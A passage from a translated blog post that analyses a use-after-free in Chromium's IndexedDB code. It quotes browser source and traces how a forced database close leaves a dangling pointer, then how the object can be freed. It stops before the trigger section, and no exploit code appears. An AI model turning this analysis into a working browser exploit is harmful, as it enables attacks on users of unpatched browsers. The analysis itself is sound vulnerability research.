class="line"><span class="keyword">var</span> deleteRequest = indexedDB.<span class="title function_">deleteDatabase</span>(dbName);</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>The details of IndexedDB are covered in the next section.</p></blockquote><h2 id="三、漏洞分析">3. Vulnerability analysis</h2><h3 id="1-connections-成员变量">1. The connections_ member variable</h3><p>Before walking through the vulnerable code, let's look at the <code>IndexedDBDatabase::connections_</code> member variable. The <code>connections_</code> set stores <strong>all connections currently attached to the <code>IndexedDBDatabase</code></strong>. Whenever a new connection attaches to the database or an existing connection is dropped, <code>connections_</code> is modified (via insert or remove). This key variable is a member of type <code>list_set</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBDatabase &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">private</span>:</span><br><span class="line">      list_set&lt;IndexedDBConnection*&gt; connections_;</span><br><span class="line">    <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p>The <code>list_set</code> type combines a <code>list</code> and a <code>set</code>; here we only care about its <code>end</code> function.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">iterator <span class="title">end</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> <span class="built_in">iterator</span>(list_.<span class="built_in">end</span>()); &#125;</span><br></pre></td></tr></table></figure><p>As shown, <code>list_set::end</code> returns <strong>an iterator of the underlying list</strong>.</p><h3 id="2-database-map-成员变量">2. 
The database_map_ member variable</h3><p>This member holds <strong>raw pointers</strong> to every open <code>IndexedDBDatabase</code>.</p><blockquote><p>Note that using raw C++ pointers directly is generally risky.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBFactoryImpl : <span class="keyword">public</span> IndexedDBFactory &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line"> <span class="keyword">private</span>:</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  std::map&lt;IndexedDBDatabase::Identifier, IndexedDBDatabase*&gt; database_map_;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>When a new database is opened, a raw pointer to it is added to <code>database_map_</code>; likewise, when a database is closed, its raw pointer is removed from <code>database_map_</code>.</p><h3 id="3-漏洞流程">3. Vulnerability flow</h3><h4 id="a-“悬垂”指针">a. 
The “dangling” pointer</h4><p>Let's first take a quick look at how a database is deleted.</p><ul><li><p>When JS calls <code>indexedDB.deleteDatabase</code>, the request travels over IPC from the renderer process to the browser (chrome) process, which runs <a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_factory_impl.cc;l=492;bpv=0;bpt=1">IndexedDBFactoryImpl::DeleteDatabase</a>. That function in turn calls <code>DeleteDatabase</code> on the matching <code>IndexedDBDatabase</code> to handle the request.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBFactoryImpl::DeleteDatabase</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> base::string16&amp; name,</span></span></span><br><span class="line"><span class="params"><span class="function">        scoped_refptr&lt;IndexedDBCallbacks&gt; callbacks,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> Origin&amp; origin,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> base::FilePath&amp; data_directory,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">bool</span> force_close)</span> </span>&#123;</span><br><span 
class="line">  <span class="built_in">IDB_TRACE</span>(<span class="string">&quot;IndexedDBFactoryImpl::DeleteDatabase&quot;</span>);</span><br><span class="line">  <span class="comment">// Each IndexedDBDatabase has a unique identifier within IndexedDBFactoryImpl</span></span><br><span class="line">  <span class="comment">// Build the identifier from the origin and database name, then look up the matching IndexedDBDatabase pointer in database_map_</span></span><br><span class="line">  <span class="function">IndexedDBDatabase::Identifier <span class="title">unique_identifier</span><span class="params">(origin, name)</span></span>;</span><br><span class="line">  <span class="type">const</span> <span class="keyword">auto</span>&amp; it = database_map_.<span class="built_in">find</span>(unique_identifier);</span><br><span class="line">  <span class="keyword">if</span> (it != database_map_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    <span class="comment">// If the database is found, call its DeleteDatabase function</span></span><br><span class="line">    it-&gt;second-&gt;<span class="built_in">DeleteDatabase</span>(callbacks, force_close);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure></li><li><p>In <a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=1862">IndexedDBDatabase::DeleteDatabase</a>, the program appends a <code>DeleteRequest</code> to the pending request queue of the current <code>IndexedDBDatabase</code>; as soon as the database reaches that <code>DeleteRequest</code>, it closes. The point is to <strong>close the database only after all remaining requests (those queued before the <code>DeleteRequest</code>) have been processed</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::DeleteDatabase</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    scoped_refptr&lt;IndexedDBCallbacks&gt; callbacks,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">bool</span> force_close)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">AppendRequest</span>(std::<span class="built_in">make_unique</span>&lt;DeleteRequest&gt;(<span class="keyword">this</span>, callbacks));</span><br><span class="line">  <span class="comment">// Close the connections only after the request is queued to make sure</span></span><br><span class="line">  <span class="comment">// the store is still open.</span></span><br><span class="line">  <span class="keyword">if</span> (force_close)</span><br><span class="line">    <span class="built_in">ForceClose</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>However, if <strong>the <code>force_close</code> flag is set</strong>, the program goes on to call <code>ForceClose</code>, which forcibly closes every <code>request</code> and <code>connection</code>. The second loop, <strong>the one that iterates over and closes the connections</strong>, is <strong>not safe</strong> when <code>connections_</code> is modified during iteration. <strong>(This is the bug!)</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// IndexedDBConnection::ForceClose() may delete this database, so hold ref.</span></span><br><span class="line">  <span class="function">scoped_refptr&lt;IndexedDBDatabase&gt; <span class="title">protect</span><span class="params">(<span class="keyword">this</span>)</span></span>;</span><br><span class="line">  <span class="comment">// Loop: forcibly abort every request that has not been processed yet</span></span><br><span class="line">  <span class="keyword">while</span> (!pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    std::unique_ptr&lt;ConnectionRequest&gt; request =</span><br><span class="line">        std::<span class="built_in">move</span>(pending_requests_.<span class="built_in">front</span>());</span><br><span class="line">    pending_requests_.<span class="built_in">pop</span>();</span><br><span class="line">    request-&gt;<span class="built_in">AbortForForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Loop: forcibly disconnect every connection attached to this database</span></span><br><span class="line">  <span class="comment">// Careful: this loop is not safe when connections_ is modified during iteration</span></span><br><span class="line">  <span class="keyword">auto</span> it = connections_.<span class="built_in">begin</span>();</span><br><span class="line">  <span class="keyword">while</span> (it != connections_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    IndexedDBConnection* connection = *it++;</span><br><span class="line">    <span 
class="comment">// Note this step: calling `connection-&gt;ForceClose()` closes the current connection.</span></span><br><span class="line">    <span class="comment">// But if that connection is the last one in connections_, StartUpgrade runs and creates a new connection</span></span><br><span class="line">    connection-&gt;<span class="built_in">ForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Sanity checks</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(connections_.<span class="built_in">empty</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!active_request_);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In the second loop, which closes the connections, the program calls <code>connection-&gt;ForceClose()</code>, i.e. <a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_connection.cc;l=48;bpv=0;bpt=0">IndexedDBConnection::ForceClose</a>, to forcibly close the connection. To release the resources this connection holds inside the <code>IndexedDBDatabase</code>, that function goes on to call <code>IndexedDBDatabase::Close</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBConnection::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!callbacks_.<span class="built_in">get</span>())</span><br><span 
class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// IndexedDBDatabase::Close() can delete this instance.</span></span><br><span class="line">  base::WeakPtr&lt;IndexedDBConnection&gt; this_obj = weak_factory_.<span class="built_in">GetWeakPtr</span>();</span><br><span class="line">  <span class="function">scoped_refptr&lt;IndexedDBDatabaseCallbacks&gt; <span class="title">callbacks</span><span class="params">(callbacks_)</span></span>;</span><br><span class="line">  <span class="comment">// Note this call</span></span><br><span class="line">  database_-&gt;<span class="built_in">Close</span>(<span class="keyword">this</span>, <span class="literal">true</span> <span class="comment">/* forced */</span>);</span><br><span class="line">  <span class="keyword">if</span> (this_obj) &#123;</span><br><span class="line">    database_ = <span class="literal">nullptr</span>;</span><br><span class="line">    callbacks_ = <span class="literal">nullptr</span>;</span><br><span class="line">    active_observers_.<span class="built_in">clear</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  callbacks-&gt;<span class="built_in">OnForcedClose</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=1897">IndexedDBDatabase::Close</a> performs a series of operations in order, but we only care about two of them here. It first <strong>removes the current connection from the <code>connections_</code> set</strong>, then <strong>calls <code>active_request_-&gt;OnConnectionClosed</code></strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::Close</span><span class="params">(IndexedDBConnection* connection, <span class="type">bool</span> forced)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(connections_.<span class="built_in">count</span>(connection));</span><br><span class="line">  <span class="built_in">DCHECK</span>(connection-&gt;<span class="built_in">IsConnected</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(connection-&gt;<span class="built_in">database</span>() == <span class="keyword">this</span>);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">IDB_TRACE</span>(<span class="string">&quot;IndexedDBDatabase::Close&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Abort all outstanding transactions on this connection</span></span><br><span class="line">  connection-&gt;<span class="built_in">FinishAllTransactions</span>(<span class="built_in">IndexedDBDatabaseError</span>(</span><br><span class="line">      blink::kWebIDBDatabaseExceptionUnknownError, <span class="string">&quot;Connection is closing.&quot;</span>));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Remove this connection from the database's connections_ set</span></span><br><span class="line">  connections_.<span 
class="built_in">erase</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Notify the active request, which may need to clean up or proceed with its operation</span></span><br><span class="line">  <span class="keyword">if</span> (active_request_)</span><br><span class="line">    active_request_-&gt;<span class="built_in">OnConnectionClosed</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Once every connection and request on this database is gone, remove the pointer to this IndexedDBDatabase from the IndexedDBFactory instance</span></span><br><span class="line">  <span class="keyword">if</span> (connections_.<span class="built_in">empty</span>() &amp;&amp; !active_request_ &amp;&amp; pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    backing_store_ = <span class="literal">nullptr</span>;</span><br><span class="line">    factory_-&gt;<span class="built_in">ReleaseDatabase</span>(identifier_, forced);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>OnConnectionClosed</code> first checks whether the pending connection <strong>was closed prematurely</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">OnConnectionClosed</span><span class="params">(IndexedDBConnection* connection)</span> <span class="keyword">override</span> 
</span>&#123;</span><br><span class="line">    <span class="comment">// The connection was closed prematurely (i.e. a pending connection was closed, which triggers OnConnectionClosed)</span></span><br><span class="line">    <span class="keyword">if</span> (connection &amp;&amp; connection-&gt;<span class="built_in">callbacks</span>() == pending_-&gt;database_callbacks) &#123;</span><br><span class="line">        pending_-&gt;callbacks-&gt;<span class="built_in">OnError</span>(</span><br><span class="line">            <span class="built_in">IndexedDBDatabaseError</span>(blink::kWebIDBDatabaseExceptionAbortError,</span><br><span class="line">                                   <span class="string">&quot;The connection was closed.&quot;</span>));</span><br><span class="line">        <span class="comment">// This request is then reset in the database</span></span><br><span class="line">        db_-&gt;<span class="built_in">RequestComplete</span>(<span class="keyword">this</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// If this connection is not the last one remaining, StartUpgrade is not reached and no new connection is created.</span></span><br><span class="line">    <span class="keyword">if</span> (!db_-&gt;connections_.<span class="built_in">empty</span>())</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">StartUpgrade</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If the connection is not a <code>pending connection</code>, meaning <strong>it was not closed prematurely</strong> (the normal case, which is easier to trigger than the abnormal one), and <strong>it is the last connection in connections_</strong>, the function calls <a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc;l=243">StartUpgrade</a>, which makes the IndexedDBDatabase <strong>create a new pending connection and add it to connections_</strong>.</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initiate the upgrade. The bulk of the work actually happens in</span></span><br><span class="line"><span class="comment">// IndexedDBDatabase::VersionChangeOperation in order to kick the</span></span><br><span class="line"><span class="comment">// transaction into the correct state.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">StartUpgrade</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Make the database create a new connection</span></span><br><span class="line">    connection_ = db_-&gt;<span class="built_in">CreateConnection</span>(pending_-&gt;database_callbacks,</span><br><span class="line">                                        pending_-&gt;child_process_id);</span><br><span class="line">    <span class="built_in">DCHECK_EQ</span>(db_-&gt;connections_.<span class="built_in">count</span>(connection_.<span class="built_in">get</span>()), <span class="number">1UL</span>);</span><br><span class="line"></span><br><span class="line">    std::vector&lt;<span class="type">int64_t</span>&gt; object_store_ids;</span><br><span class="line"></span><br><span class="line">    IndexedDBTransaction* 
transaction = connection_-&gt;<span class="built_in">CreateTransaction</span>(</span><br><span class="line">        pending_-&gt;transaction_id,</span><br><span class="line">        std::<span class="built_in">set</span>&lt;<span class="type">int64_t</span>&gt;(object_store_ids.<span class="built_in">begin</span>(), object_store_ids.<span class="built_in">end</span>()),</span><br><span class="line">        blink::mojom::IDBTransactionMode::VersionChange,</span><br><span class="line">        <span class="keyword">new</span> IndexedDBBackingStore::<span class="built_in">Transaction</span>(db_-&gt;<span class="built_in">backing_store</span>()));</span><br><span class="line">    db_-&gt;<span class="built_in">RegisterAndScheduleTransaction</span>(transaction);</span><br><span class="line"></span><br><span class="line">    transaction-&gt;<span class="built_in">ScheduleTask</span>(</span><br><span class="line">        base::<span class="built_in">BindOnce</span>(&amp;IndexedDBDatabase::VersionChangeOperation, db_,</span><br><span class="line">                       pending_-&gt;version, pending_-&gt;callbacks));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>As a result, the <code>connections_</code> set is no longer empty. When control returns from <code>OnConnectionClosed</code>, the check below fails, so <code>factory_-&gt;ReleaseDatabase</code> is never called.</p><blockquote><p>The expectation is that once the last connection has been erased, execution always enters the if statement below and calls <code>factory_-&gt;ReleaseDatabase</code>; here that clearly does not happen.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> 
<span class="title">IndexedDBDatabase::Close</span><span class="params">(IndexedDBConnection* connection, <span class="type">bool</span> forced)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (active_request_)</span><br><span class="line">    active_request_-&gt;<span class="built_in">OnConnectionClosed</span>(connection);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Once every connection and request on this database is gone, remove the pointer to this IndexedDBDatabase from the IndexedDBFactory instance</span></span><br><span class="line">  <span class="keyword">if</span> (connections_.<span class="built_in">empty</span>() &amp;&amp; !active_request_ &amp;&amp; pending_requests_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    backing_store_ = <span class="literal">nullptr</span>;</span><br><span class="line">    factory_-&gt;<span class="built_in">ReleaseDatabase</span>(identifier_, forced);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>factory_-&gt;ReleaseDatabase</code> removes <strong>the raw pointer to the current database</strong> from <code>database_map_</code>. In other words, if <code>IndexedDBFactoryImpl::ReleaseDatabase</code> is never called, <strong>that raw pointer stays in <code>database_map_</code></strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBFactoryImpl::ReleaseDatabase</span><span 
class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> IndexedDBDatabase::Identifier&amp; identifier,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">bool</span> forced_close)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!database_map_.<span class="built_in">find</span>(identifier)-&gt;second-&gt;<span class="built_in">backing_store</span>());</span><br><span class="line">  <span class="comment">// Remove the raw IndexedDBDatabase pointer from database_map_</span></span><br><span class="line">  <span class="built_in">RemoveDatabaseFromMaps</span>(identifier);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// No grace period on a forced-close, as the initiator is</span></span><br><span class="line">  <span class="comment">// assuming the backing store will be released once all</span></span><br><span class="line">  <span class="comment">// connections are closed.</span></span><br><span class="line">  <span class="built_in">ReleaseBackingStore</span>(identifier.first, forced_close);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>In the end, the <strong>raw pointer</strong> kept in <code>database_map_</code> <strong>is never removed</strong>.</p></li><li><p>Meanwhile, when control returns to <code>IndexedDBDatabase::ForceClose</code>, <code>connections_</code> has gone through both an <code>erase</code> and an <code>insert</code>. So the next time the loop condition <code>it != connections_.end()</code> is evaluated, the <code>connections_</code> set still holds a connection (though not the same one as before), and <strong>its element count is unchanged</strong>.</p><p>Because <code>end</code> returns the iterator of the underlying <code>list</code>, <strong>the <code>end</code> iterator itself is unchanged</strong>. Since <code>it</code> was already advanced by <code>it++</code>, it now equals <code>end</code>, so the loop exits and <strong>the connection teardown</strong> finishes.</p><p>Most importantly, <code>IndexedDBFactoryImpl::database_map_</code> <strong>still holds the raw pointer to the current database</strong>. That pointer should have been removed by the time this loop finished, but it was not.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBDatabase::ForceClose</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">auto</span> it = connections_.<span class="built_in">begin</span>();</span><br><span class="line">  <span class="keyword">while</span> (it != connections_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    IndexedDBConnection* connection = *it++;</span><br><span class="line">    <span class="comment">// Note this step: calling `connection-&gt;ForceClose()` closes the current connection.</span></span><br><span class="line">    <span class="comment">// But if that connection is the last one in connections_, StartUpgrade runs and creates a new connection</span></span><br><span class="line">    connection-&gt;<span class="built_in">ForceClose</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>At this point we have managed to leave a raw pointer to the current <code>IndexedDBDatabase</code> <strong>somewhere it should no longer be</strong> (namely <code>database_map_</code>). The next step is to get the memory used by that <code>IndexedDBDatabase</code> freed.</p></li></ul><h4 id="b-释放IndexedDB内存">b. 
Freeing the IndexedDB memory</h4><ul><li><p>An IndexedDBDatabase object is <strong>reference counted</strong>. Counted references to it are held by IndexedDBConnection objects, IndexedDBTransaction objects, and other in-flight or pending request objects. As soon as the reference count drops to 0, the object is freed. (This repeats an earlier point, as a reminder.)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBConnection &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// NULL in some unit tests, and after the connection is closed.</span></span><br><span class="line">  scoped_refptr&lt;IndexedDBDatabase&gt; database_;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CONTENT_EXPORT</span> IndexedDBTransaction &#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  scoped_refptr&lt;IndexedDBDatabase&gt; database_;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In other words, once every Connection and Transaction object tied to the current IndexedDBDatabase has been released, the IndexedDBDatabase is freed automatically because its reference count reaches 0.</p></li><li><p>Issue 941746 describes one way to do this: free the IndexedDBDatabase object by calling <code>IndexedDBFactoryImpl::AbortTransactionsForDatabase</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Call chain</span></span><br><span class="line">content::IndexedDBFactoryImpl::AbortTransactionsForDatabase</span><br><span class="line">  content::IndexedDBFactoryImpl::AbortTransactions                 <span class="comment">// Loops over every IndexedDBDatabase, calling AbortAllTransactionsForConnections</span></span><br><span class="line">    content::IndexedDBDatabase::AbortAllTransactionsForConnections <span class="comment">// Loops over every Connection, calling FinishAllTransactions</span></span><br><span class="line">      content::IndexedDBConnection::FinishAllTransactions          <span class="comment">// Loops over every Transaction, calling Abort</span></span><br><span class="line">        content::IndexedDBTransaction::Abort</span><br><span class="line">          content::IndexedDBConnection::RemoveTransaction          <span class="comment">// Releases the Transaction</span></span><br><span class="line">          content::IndexedDBDatabase::TransactionFinished          <span class="comment">// Releases the Connection</span></span><br></pre></td></tr></table></figure><p>Calling <code>AbortTransactionsForDatabase</code> releases every <code>IndexedDBConnection</code> and <code>IndexedDBTransaction</code>, which in turn frees the <code>IndexedDBDatabase</code> object. That is exactly what we need in order to free a chosen IndexedDBDatabase object.</p><blockquote><p>The key code of IndexedDBTransaction::Abort is shown here. <strong>Pay attention to the comments inside the function</strong>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">IndexedDBTransaction::Abort</span><span class="params">(<span class="type">const</span> IndexedDBDatabaseError&amp; error)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  database_-&gt;<span class="built_in">TransactionFinished</span>(<span class="keyword">this</span>, <span class="literal">false</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// RemoveTransaction will delete |this|.</span></span><br><span class="line">  <span class="comment">// Note: During force-close situations, the connection can be destroyed during</span></span><br><span class="line">  <span class="comment">// the |IndexedDBDatabase::TransactionFinished| call</span></span><br><span class="line">  <span class="comment">// Per the comment above: with `force_close = true`, running this function releases both the connection and the transaction</span></span><br><span class="line">  <span class="keyword">if</span> (connection_)</span><br><span class="line">    connection_-&gt;<span class="built_in">RemoveTransaction</span>(id_);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-如何触发UAF">c. 
